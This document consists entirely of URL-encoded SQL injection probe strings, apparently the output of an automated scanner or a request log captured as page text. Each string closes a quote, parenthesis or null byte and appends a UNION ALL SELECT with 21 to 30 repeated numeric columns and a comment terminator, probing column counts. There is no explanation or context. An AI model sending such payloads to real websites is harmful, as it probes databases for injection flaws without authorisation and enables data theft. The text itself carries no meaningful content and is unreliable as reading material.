-7651%22%20UNION%20ALL%20SELECT%207446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%2C7446%23 -5165%22%20UNION%20ALL%20SELECT%204669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%2C4669%23 -7729%22%29%20UNION%20ALL%20SELECT%205335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%2C5335%23 -7491%22%29%20UNION%20ALL%20SELECT%202855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%2C2855%23 -8169%22%29%20UNION%20ALL%20SELECT%202310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%23 -9406%22%29%20UNION%20ALL%20SELECT%207730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%2C7730%23 -6426%22%29%20UNION%20ALL%20SELECT%201462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%2C1462%23 -1184%22%29%20UNION%20ALL%20SELECT%205464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%2C5464%23 -1575%22%29%20UNION%20ALL%20SELECT%208058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%2C8058%23 -3290%22%29%20UNION%20ALL%20SELECT%202334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%2C2334%23 -5167%22%29%20UNION%20ALL%20SELECT%205855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%2C5855%23 -3959%22%29%20UNION%20ALL%20SELECT%203937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%2C3937%23 -6280%22%29%29%20UNION%20ALL%20SELECT%204691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%2C4691%23 -7036%22%29%29%20UNION%20ALL%20SELECT%202668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%2C2668%23 -8539%22%29%29%20UNION%20ALL%20SELECT%203172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%2C3172%23 -3972%22%29%29%20UNION%20ALL%20SELECT%205880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%23 -5832%22%29%29%20UNION%20ALL%20SELECT%209599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%2C9599%23 -7066%22%29%29%20UNION%20ALL%20SELECT%201049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%2C1049%23 -2127%22%29%29%20UNION%20ALL%20SELECT%201065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%2C1065%23 -2716%22%29%29%20UNION%20ALL%20SELECT%208737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%2C8737%23 -2964%22%29%29%20UNION%20ALL%20SELECT%205846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%23 -2682%22%29%29%20UNION%20ALL%20SELECT%201112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%2C1112%23 -1948%22%29%29%29%20UNION%20ALL%20SELECT%209494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%2C9494%23 -7823%22%29%29%29%20UNION%20ALL%20SELECT%207308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%23 -4214%22%29%29%29%20UNION%20ALL%20SELECT%205743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%2C5743%23 -3386%22%29%29%29%20UNION%20ALL%20SELECT%201219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%2C1219%23 -2353%22%29%29%29%20UNION%20ALL%20SELECT%208152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%2C8152%23 -1908%22%29%29%29%20UNION%20ALL%20SELECT%205600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%23 -5352%22%29%29%29%20UNION%20ALL%20SELECT%201378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%23 -4274%22%29%29%29%20UNION%20ALL%20SELECT%208654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%2C8654%23 -8635%22%29%29%29%20UNION%20ALL%20SELECT%202691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%2C2691%23 -1226%22%29%29%29%20UNION%20ALL%20SELECT%204365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%2C4365%23 -1698%22%20UNION%20ALL%20SELECT%204207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%23 -8418%22%20UNION%20ALL%20SELECT%203393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%2C3393%23 -5943%22%20UNION%20ALL%20SELECT%206531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%2C6531%23 -4664%22%20UNION%20ALL%20SELECT%203139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%2C3139%23 -3452%22%20UNION%20ALL%20SELECT%203866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%2C3866%23 -4622%22%20UNION%20ALL%20SELECT%203262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%2C3262%23 -8469%22%20UNION%20ALL%20SELECT%202435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%2C2435%23 -9347%22%20UNION%20ALL%20SELECT%201168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%23 -6578%22%20UNION%20ALL%20SELECT%208742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%23 -1618%22%20UNION%20ALL%20SELECT%208487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%23 -4986%25%27%29%20UNION%20ALL%20SELECT%201501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%2C1501%23 -8230%25%27%29%20UNION%20ALL%20SELECT%201392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%2C1392%23 -2023%25%27%29%20UNION%20ALL%20SELECT%202592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%2C2592%23 -8448%25%27%29%20UNION%20ALL%20SELECT%205111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%2C5111%23 -9388%25%27%29%20UNION%20ALL%20SELECT%203454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%2C3454%23 -9752%25%27%29%20UNION%20ALL%20SELECT%201583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%2C1583%23 -4228%25%27%29%20UNION%20ALL%20SELECT%202684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%2C2684%23 -2569%25%27%29%20UNION%20ALL%20SELECT%203200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%23 -9388%25%27%29%20UNION%20ALL%20SELECT%209332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%2C9332%23 -3837%25%27%29%20UNION%20ALL%20SELECT%206102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%2C6102%23 -2907%25%27%29%29%20UNION%20ALL%20SELECT%208713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%2C8713%23 -6707%25%27%29%29%20UNION%20ALL%20SELECT%201083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%2C1083%23 -5078%25%27%29%29%20UNION%20ALL%20SELECT%209407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%23 -1692%25%27%29%29%20UNION%20ALL%20SELECT%206315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%2C6315%23 -7231%25%27%29%29%20UNION%20ALL%20SELECT%207672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%2C7672%23 -7028%25%27%29%29%20UNION%20ALL%20SELECT%201238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%23 -4564%25%27%29%29%20UNION%20ALL%20SELECT%202578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%23 -8582%25%27%29%29%20UNION%20ALL%20SELECT%202179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%2C2179%23 -8775%25%27%29%29%20UNION%20ALL%20SELECT%202533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%2C2533%23 -6188%25%27%29%29%20UNION%20ALL%20SELECT%203750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%23 -4934%25%27%29%29%29%20UNION%20ALL%20SELECT%207166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%2C7166%23 -1032%25%27%29%29%29%20UNION%20ALL%20SELECT%208714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%2C8714%23 -6784%25%27%29%29%29%20UNION%20ALL%20SELECT%202444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%2C2444%23 -9550%25%27%29%29%29%20UNION%20ALL%20SELECT%204149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%2C4149%23 -6858%25%27%29%29%29%20UNION%20ALL%20SELECT%202726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%2C2726%23 -3016%25%27%29%29%29%20UNION%20ALL%20SELECT%208454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%23 -2473%25%27%29%29%29%20UNION%20ALL%20SELECT%205545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%2C5545%23 -8927%25%27%29%29%29%20UNION%20ALL%20SELECT%204971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%2C4971%23 -5964%25%27%29%29%29%20UNION%20ALL%20SELECT%202617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%23 -7488%25%27%29%29%29%20UNION%20ALL%20SELECT%209124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%2C9124%23 -2926%25%27%20UNION%20ALL%20SELECT%208719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%2C8719%23 -2873%25%27%20UNION%20ALL%20SELECT%201059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%2C1059%23 -6686%25%27%20UNION%20ALL%20SELECT%204760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%2C4760%23 -5633%25%27%20UNION%20ALL%20SELECT%208469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%23 -4818%25%27%20UNION%20ALL%20SELECT%208038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%2C8038%23 -1521%25%27%20UNION%20ALL%20SELECT%203363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%2C3363%23 -2220%25%27%20UNION%20ALL%20SELECT%207673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%2C7673%23 -6100%25%27%20UNION%20ALL%20SELECT%208512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%2C8512%23 -5468%25%27%20UNION%20ALL%20SELECT%203065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%2C3065%23 -9455%25%27%20UNION%20ALL%20SELECT%204539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%2C4539%23 -1461%00%27%29%20UNION%20ALL%20SELECT%207667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%2C7667%23 -2712%00%27%29%20UNION%20ALL%20SELECT%204429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%2C4429%23 -4600%00%27%29%20UNION%20ALL%20SELECT%208293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%2C8293%23 -7651%00%27%29%20UNION%20ALL%20SELECT%205022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%2C5022%23 -8946%00%27%29%20UNION%20ALL%20SELECT%202685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%2C2685%23 -1935%00%27%29%20UNION%20ALL%20SELECT%208202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%2C8202%23 -8481%00%27%29%20UNION%20ALL%20SELECT%203472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%2C3472%23 -3045%00%27%29%20UNION%20ALL%20SELECT%202457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%2C2457%23 -6829%00%27%29%20UNION%20ALL%20SELECT%205601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%2C5601%23 -9989%00%27%29%20UNION%20ALL%20SELECT%202023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%2C2023%23 -5952%00%27%20UNION%20ALL%20SELECT%204817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%23 -2668%00%27%20UNION%20ALL%20SELECT%207682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%23 -6547%00%27%20UNION%20ALL%20SELECT%206861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%2C6861%23 -7704%00%27%20UNION%20ALL%20SELECT%209597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%2C9597%23 -4368%00%27%20UNION%20ALL%20SELECT%208838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%2C8838%23 